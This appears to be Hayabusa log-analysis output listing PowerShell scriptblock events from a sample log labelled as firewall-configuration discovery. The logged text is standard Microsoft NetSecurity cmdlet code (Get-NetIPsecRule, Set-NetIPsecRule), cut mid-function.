[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description',",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 